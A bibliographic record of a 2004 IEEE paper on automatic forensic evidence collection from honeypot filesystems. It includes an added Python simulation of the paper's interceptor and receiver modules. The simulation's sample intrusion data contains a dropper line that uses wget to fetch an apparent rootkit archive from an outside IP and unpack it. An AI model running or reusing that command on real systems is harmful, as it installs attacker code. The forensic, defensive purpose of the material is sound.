• DocumentCode
    3307788
  • Title
    A mechanism for automatic digital evidence collection on high-interaction honeypots
  • Author
    Carbone, M.d.P.A.; De Geus, Paulo Lício
  • fYear
    2004
  • fDate
    10-11 June 2004
  • Firstpage
    1
  • Lastpage
    8
  • Abstract
    Honeypots are computational resources whose value resides in being probed, attacked or compromised by invaders. This makes it possible to obtain information about their methods, tools and motivations. On high-interaction honeypots this is done, among other ways, by collecting digital evidence. This collection is traditionally done manually and statically, demanding time and not always generating good results. In this paper, we describe an automatic, dynamic and transparent mechanism for collecting digital evidence from the filesystem of honeypots, eliminating the flaws found in the traditional methods. The mechanism consists of two modules: an interceptor module, that intercepts some preselected system calls on the honeypot and transmits the argument data to the honeynet; and a receiver module, that captures the transmitted data and reconstructs on the honeywall the evidence produced by an intruder during an invasion. A prototype based on the mechanism was implemented and tested in real intrusion situations. The mechanism's behavior in one of these situations is also described, followed by an analysis of the results.
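    The interceptor/receiver split described in the abstract, as an added illustration that is not the paper's prototype: the real interceptor hooks file-related system calls inside the honeypot kernel, which is simulated here by a function that serialises the argument data of a preselected call set into records for transmission to the honeywall. The receiver replays those records onto a shadow tree and, unlike a static post-mortem image, keeps a copy of every file the intruder later truncated, renamed over or deleted, and flags gaps in the record sequence so lost transmissions are visible. Paths, the IP address and the dropped script are constructed sample data.

```python
"""Simulated interceptor/receiver pair for honeypot filesystem evidence.

Illustration only, not the paper's prototype. The interceptor side is
modelled by encode_record(); the receiver rebuilds files on a shadow tree
and preserves contents that the intruder later removed.
"""
import base64
import json
from dataclasses import dataclass, field

# Preselected system calls whose argument data is forwarded (assumed set).
INTERCEPTED = {"write", "unlink", "rename", "truncate"}


def encode_record(seq, syscall, **args):
    """Interceptor side: serialise one intercepted call as a JSON line.

    A sequence number lets the receiver detect lost records; raw write data
    is base64 encoded so it survives a text channel to the honeywall."""
    if syscall not in INTERCEPTED:
        raise ValueError(f"syscall not preselected: {syscall}")
    if "data" in args:
        args["data"] = base64.b64encode(args["data"]).decode("ascii")
    return json.dumps({"seq": seq, "call": syscall, "args": args})


@dataclass
class Receiver:
    files: dict = field(default_factory=dict)      # path -> bytearray (current state)
    evidence: dict = field(default_factory=dict)   # path -> snapshots taken before destructive calls
    expected_seq: int = 0
    lost: list = field(default_factory=list)       # (expected, received) pairs marking gaps

    def _snapshot(self, path):
        """Preserve the current contents of path before it is altered destructively."""
        if path in self.files:
            self.evidence.setdefault(path, []).append(bytes(self.files[path]))

    def feed(self, line):
        """Receiver side: apply one transmitted record to the shadow tree."""
        rec = json.loads(line)
        if rec["seq"] != self.expected_seq:
            self.lost.append((self.expected_seq, rec["seq"]))
        self.expected_seq = rec["seq"] + 1
        call, a = rec["call"], rec["args"]
        if call == "write":
            buf = self.files.setdefault(a["path"], bytearray())
            data, off = base64.b64decode(a["data"]), a["offset"]
            if off > len(buf):                       # sparse write: pad like the kernel does
                buf.extend(b"\0" * (off - len(buf)))
            buf[off:off + len(data)] = data
        elif call == "truncate":
            self._snapshot(a["path"])
            del self.files.setdefault(a["path"], bytearray())[a["length"]:]
        elif call == "unlink":
            self._snapshot(a["path"])
            self.files.pop(a["path"], None)
        elif call == "rename":
            if a["old"] in self.files:
                self._snapshot(a["old"])
                self._snapshot(a["new"])             # overwritten target is kept too
                self.files[a["new"]] = self.files.pop(a["old"])

    def history(self, path):
        """Every content version seen for path: preserved snapshots, then the live copy."""
        out = list(self.evidence.get(path, []))
        if path in self.files:
            out.append(bytes(self.files[path]))
        return out


def replay_session():
    """Constructed sample intrusion: a dropper script is written in two chunks,
    one record is lost in transit (seq 2), and the intruder deletes the script."""
    path = "/tmp/.x/inst.sh"
    part1 = b"#!/bin/sh\n"
    part2 = b"wget http://198.51.100.7/rk.tgz && tar xzf rk.tgz\n"
    session = [
        encode_record(0, "write", path=path, offset=0, data=part1),
        encode_record(1, "write", path=path, offset=len(part1), data=part2),
        encode_record(3, "unlink", path=path),
    ]
    receiver = Receiver()
    for line in session:
        receiver.feed(line)
    return receiver


if __name__ == "__main__":
    r = replay_session()
    print("live files:", list(r.files))
    print("recovered:", r.history("/tmp/.x/inst.sh"))
    print("gaps:", r.lost)
```

    The snapshot-before-destruction rule is what makes the collection dynamic rather than static: a disk image taken after the intrusion would show no trace of the deleted script, while the receiver still holds its full contents. In a real deployment the records would cross the honeynet to the honeywall, so the sequence gap list is the check a practitioner should look at first before trusting the reconstruction.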
  • Keywords
    network operating systems; security of data; automatic digital evidence collection; high-interaction honeypots filesystem; interceptor module; Forensics; Information resources; Operating systems; Proposals; Prototypes; Psychology; Read-write memory; Remote monitoring; Telecommunication traffic; Testing;
  • fLanguage
    English
  • Publisher
    ieee
  • Conference_Titel
    Information Assurance Workshop, 2004. Proceedings from the Fifth Annual IEEE SMC
  • Print_ISBN
    0-7803-8572-1
  • Type
    conf
  • DOI
    10.1109/IAW.2004.1437790
  • Filename
    1437790